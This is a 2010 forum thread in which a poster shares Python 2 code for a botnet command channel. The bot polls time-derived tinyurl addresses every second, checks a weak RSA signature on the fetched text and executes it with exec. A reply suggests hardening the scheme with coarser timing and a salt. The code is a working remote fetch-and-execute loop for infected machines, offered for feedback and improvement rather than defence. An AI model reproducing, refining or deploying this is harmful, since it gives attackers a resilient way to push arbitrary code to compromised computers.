Botnet Command; Ep701

[N3Ar]

Hey guys I just watched the show, episode 701, and Mr daren made a comment about everyone beeing able to send commands to the botnet. He also asked what kind of language could be used(and he mentioned python).

Well I think that hashing the script+signing the script using an RSA key would do the trick.. I'm using the tinyurl idea, anyways i wrote a litle piece of code, so everyone could get the idea..

import urllib2
import time
#I'm using the build-in commands to make everything simple to understand.

#i used on purpose a very small rsa key. Here is the private part:
#1010693124043243545751267641549720737580824554323031507505058361376182502064774
3669133551435099535035835371621642498954346254965071187678761958624260885369
exp=3
rsakey=6737954160288290305008450943664804917205497028820210050033722409174550013
76502819075007717863922529820033825362060571087308695102967167320217085438219053
1

def check_web ():
    nowis=time.asctime()
    i=abs(hash(nowis))   #you MUST change this hashing function!
    print "opening http://tinyurl.com/%s"%i
    web=urllib2.urlopen("http://tinyurl.com/%s"%i)
    text=web.read()
    web.close()
    if "Please check that the URL entered is correct. To learn more about TinyURL.com, please visit the" in text:
        print "the url did not exist!"
    else :
        print "url found!"
        if "###END###" in text:
            try:
                script,key=text.split("###END###")
                key=int(key)
            except:
                print 'more than one "###END###" in text'
            else:  #will be executed if exception doesn't occur
                if pow(key,exp,rsakey)==abs(hash(script+nowis)):
                    # This is the reason why i wrote it in python:                    
                    exec script
        else :
            print 'no "###END###" in text'

while 1:
    time.sleep(1)
    check_web()

and it does work prety well... Note that if i use script+nowis for the hash, it is because i want a command to be executed only once.

And it makes me think, there was a big trojan recently that used the same idea, but with domain names ^^$

Anyways, i'd like some feedback, your ideas..

Edited February 23, 2010 by N3Ar

[Keltha]

I think reducing the accuracy of the time from seconds to maybe every 10 seconds would be a good idea, also try appending a salt to the time before hashing it.